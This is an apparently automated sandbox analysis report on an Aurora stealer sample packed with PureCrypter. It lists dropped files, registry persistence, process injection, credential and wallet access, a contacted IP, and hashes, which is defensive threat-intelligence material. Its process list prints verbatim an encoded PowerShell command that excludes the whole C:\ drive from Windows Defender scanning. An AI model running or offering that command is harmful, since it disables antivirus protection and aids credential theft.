Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
Aurora
Detect PureCrypter injector
PureCrypter
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:25
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:25
Reported
2023-02-05 13:27
Platform
win10v2004-20220812-en
Max time kernel
68s
Max time network
129s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2664 set thread context of 3956 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| DE | 45.9.74.11:8081 | tcp | |
| BE | 8.238.111.126:80 | tcp | |
| BE | 8.238.111.126:80 | tcp |
Files
memory/4912-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | b8d81a3b130377669b4929993b339ec8 |
| SHA1 | c5b57971584e06dedb521de936de257815fe7a29 |
| SHA256 | e7ee343aff03b95779eec8da0be8f1341b66008b9c60281a4705ece8b53c218e |
| SHA512 | 3bde4b4bf4dc33c188a079eb4f91818bda2bae10b5ebcd620d29295538d54a6caeb9e254e47a561d15091abeb25b840d55572f1cc4e26f1cc6bc2160eb3e23a7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | a86784bb28a698ef02243ed88082097f |
| SHA1 | c6b13e845cc72789f5a7a3c5dc1113b4bfae5f70 |
| SHA256 | 9dab7f8bfad9ab41b2791aa512e7b42f3f9dde29227a2e23d7b5c4f4ec4415ac |
| SHA512 | dc1fccdb963b8aef6f34ebf3a7ba32ed1d55e8bfda03f9092b34cf67c7ffc9869622e85da1aadd360563bdd8bd9c1f43538c8d1715777da08ecb3f3fb5f0cd16 |
memory/2664-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 2a1480975d44941fbd70d4c924d045cf |
| SHA1 | cfa9a2c91eb8fa7056413e717211485dbdef1f70 |
| SHA256 | e7a83ed58b5ce694665b2a8e5cc617ea9c85fd382fd0172da54abf2db3162e99 |
| SHA512 | 7f64ea63f96f9753d4c3f913745c95f146c948461790fd6e6f0b8e8ebed0003267fca9b46e37b1e50b96d63832ac5e21adbc50b94c3079064a4c77f713d75a3f |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 3ccae81ac10a8cbfb364c130aa781dd0 |
| SHA1 | 6437406c7c8c9e17e0a9950dee7a4bf6fadc6031 |
| SHA256 | 1b090f4693d568813c0f7144a39888178d33694d889347c7cf4bce17996a2399 |
| SHA512 | 2d1eee891d19c60812617b903389d1a69862a8dd5f5e2c74a8b3ada147a3fda0ecc234e8367de7ac39237e69ae2beb61ac735eaf5479832ac56035123658b61a |
memory/2664-138-0x0000000000860000-0x0000000000FD4000-memory.dmp
memory/2664-139-0x0000000006F20000-0x0000000006F42000-memory.dmp
memory/1568-140-0x0000000000000000-mapping.dmp
memory/1568-141-0x0000000002CF0000-0x0000000002D26000-memory.dmp
memory/1568-142-0x0000000005440000-0x0000000005A68000-memory.dmp
memory/1568-143-0x0000000005BE0000-0x0000000005C46000-memory.dmp
memory/1568-144-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1568-145-0x00000000062D0000-0x00000000062EE000-memory.dmp
memory/1568-146-0x0000000007920000-0x0000000007F9A000-memory.dmp
memory/1568-147-0x00000000067E0000-0x00000000067FA000-memory.dmp
memory/2192-148-0x0000000000000000-mapping.dmp
memory/3868-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | d6bc392b638c44f60681982b871fcb3b |
| SHA1 | 8c06041dd7c2894f850c522a3a126838b3ec87e4 |
| SHA256 | d1d7fb67c24395e0f6fbde3a4009881a8e9ebd2ed5d4a0f89713bd08cd294153 |
| SHA512 | 6020e4c0101a5f7d5744eaf4a793a768a3afe3b0ed12b4e8b99d057f7bc84e47e1f8767e800aa9e827c34bac0e389e13c5d4a3d774aa005a5316dedd1a809d03 |
memory/3956-153-0x0000000000000000-mapping.dmp
memory/3876-150-0x0000000000000000-mapping.dmp
memory/3956-154-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 91bc4c5762c068b279a5df98f01348f6 |
| SHA1 | bad0ce46214ef25223a14fdcc25a3290be5d7639 |
| SHA256 | 6a413febe4f1ead04488ae7bd601cfcc9993b0213c20d1d4e300cf95ed064f2a |
| SHA512 | 759250bac905336f3a832bdfc3848d85c283981264ff712701304c457c3521b0f2926d0755756a22939048c777f464baeb80aa72da7e28dc4dd0e4d09f8d25fa |
memory/3956-157-0x0000000000400000-0x0000000000731000-memory.dmp
memory/3956-158-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ca0bc3be3325c957199884413460f07 |
| SHA1 | b722b745a11eeb9729af5166bf1bfa615c977e34 |
| SHA256 | 60ab170c1d131d51d72db43ca9d4beb6b00076625c00826f97aaf4fe6b3ed51a |
| SHA512 | cccd4feeb4129232f3a118a014ed7a9750fe5551b5e2df5c34b04733c923e2c014fc2659c529417c523bb8a4da8d7fccc700bad4d84ab2430eb03b9a552f1376 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/3868-162-0x0000000007530000-0x0000000007562000-memory.dmp
memory/2304-161-0x0000000000000000-mapping.dmp
memory/3868-163-0x0000000072470000-0x00000000724BC000-memory.dmp
memory/3868-164-0x0000000006AD0000-0x0000000006AEE000-memory.dmp
memory/3868-165-0x00000000078F0000-0x00000000078FA000-memory.dmp
memory/1192-166-0x0000000000000000-mapping.dmp
memory/4060-167-0x0000000000000000-mapping.dmp
memory/3868-168-0x0000000007B30000-0x0000000007BC6000-memory.dmp
memory/1412-169-0x0000000000000000-mapping.dmp
memory/4964-170-0x0000000000000000-mapping.dmp
memory/3868-171-0x00000000063A0000-0x00000000063AE000-memory.dmp
memory/3868-172-0x0000000007A90000-0x0000000007AAA000-memory.dmp
memory/3868-173-0x0000000007A70000-0x0000000007A78000-memory.dmp
memory/3956-174-0x0000000000400000-0x0000000000731000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:25
Reported
2023-02-05 13:27
Platform
win7-20220901-en
Max time kernel
60s
Max time network
48s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | b16645eba125598b5ccd3d2f374c0e58 |
| SHA1 | d83f019f32c5061f2a6cfe0191cf2b1033d35ba9 |
| SHA256 | afbde4bc1a55956a07fe46dbd46232a6d7b24cddf3c305463b8300b2443d113c |
| SHA512 | 7d64eda1068f971319605adafba4941c15e313c808b01fdddb340e1d17aa8f22b57eed879b874e61f954115e22292341c7a71981e199a214dfbb132b57b872ae |
memory/1104-54-0x0000000000000000-mapping.dmp
memory/1104-56-0x0000000075A71000-0x0000000075A73000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 6b76a01acb3153e8ba6992946c57304d |
| SHA1 | fcc3c1e9b59a45c3257ff955ffc8c9866155bcca |
| SHA256 | c20e834704e463b44106ca5719c719ca357d54723ca0cada70d9a0119f88a022 |
| SHA512 | 58e8d64fbbbede50a7f8f486bb49106f355727c90cc7d125b117ad2f28990855a6caf7811669726f7ab6496725d921fb8c4dd3f3b8cbc75e7c9f17865e7a0588 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | ae86db5593b9c6d25b511f3007c377b4 |
| SHA1 | 30e8a45c9a675a1a0cbac31b4589d849aa80df33 |
| SHA256 | 95d60f16554990bc97a65a0028923e789d93068b7e0c489e36abda27d12e6cd5 |
| SHA512 | f2e4adca7bb878ccec98b01cfcd12584baeb3181ba37aad159130e14f0b402093366c73231660439ee41af06aa25089668c592f55077d825c85a42e76e79857f |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | c790ebd4743fe791551945446b41934a |
| SHA1 | 5702636451a716c242b1661da51f79fe75b293b6 |
| SHA256 | 703f44a98bdeb815f349adafaa20178fc4b9477c92298fe400e2351c5721d5a0 |
| SHA512 | c4a54c43f27a1166812a1281355c013c81d534b3642bdc7b2090f71e3663afcd9a3cc94030029f01b58cf10b8081303417722c9caebb2f651cde3ad64f37baaa |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 9ba580cde6e06b3975d34285681bb19c |
| SHA1 | 8e1b7a5e89de8f4f7e9605ee8637dbcd24153b62 |
| SHA256 | 380eef61cf2e02636b63915c91a942b683b9500f6f68c39c28dd3129aae6fc97 |
| SHA512 | 08c3ce3258c5a81741abf253e28a5c1cc23befa063a92e3a11d28ccc178631f3233159135f01c7f47f2e9d41eb7287b171eaebcefe80699c6bb71adf2d0a3a76 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | a1795f4d29094e2d01d383f91a312c11 |
| SHA1 | a27fdc6c4b6bda3cf9965cab3954d839ab0eba38 |
| SHA256 | 69a4f41b6b599c39c5682dd911be57bd818d51f655922385e636153b171cfa6d |
| SHA512 | 969c082332b11e3f7bc3a9fa00c9d68f1b0023bdfda4c9e32693051b89ac693549db18b7a0e6ca4a218e450d1f8b591a9c164c445905fc18d4c6b181719ae99c |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e77c54b046c2dc2963cb5aa45296bcb2 |
| SHA1 | 3818b1964eadb0ae24f5f1b0d4cc31b9c1cfa0df |
| SHA256 | 766fee60cc01cb387de311cea626330219a0a32155878ad2b4a80748e5cfc320 |
| SHA512 | a62b4e5c41beba4fa7b21f3a97bd0d9032cce44b3549df30c376eb79bc461fa7a966d556c3aa2b867943663bc81e1bc2b0678eaf703c6f712901478f2b78cc33 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | ae86db5593b9c6d25b511f3007c377b4 |
| SHA1 | 30e8a45c9a675a1a0cbac31b4589d849aa80df33 |
| SHA256 | 95d60f16554990bc97a65a0028923e789d93068b7e0c489e36abda27d12e6cd5 |
| SHA512 | f2e4adca7bb878ccec98b01cfcd12584baeb3181ba37aad159130e14f0b402093366c73231660439ee41af06aa25089668c592f55077d825c85a42e76e79857f |
memory/940-62-0x0000000000000000-mapping.dmp
memory/940-65-0x00000000003E0000-0x0000000000B54000-memory.dmp
memory/940-66-0x00000000064E0000-0x0000000006880000-memory.dmp
memory/1716-67-0x0000000000000000-mapping.dmp
memory/1716-69-0x000000006FEB0000-0x000000007045B000-memory.dmp
memory/1716-70-0x000000006FEB0000-0x000000007045B000-memory.dmp
memory/1716-71-0x000000006FEB0000-0x000000007045B000-memory.dmp
memory/540-72-0x0000000000000000-mapping.dmp
memory/848-73-0x0000000000000000-mapping.dmp
memory/940-74-0x00000000054C0000-0x0000000005632000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 84cba196aa2390decef7e30e3244776c |
| SHA1 | 546a950bd6baa70959791694f6401c899851e3f1 |
| SHA256 | 632824d55f08324898b1dd4ebc95257934e664049e2d7ced3b9f4041d6bf29c8 |
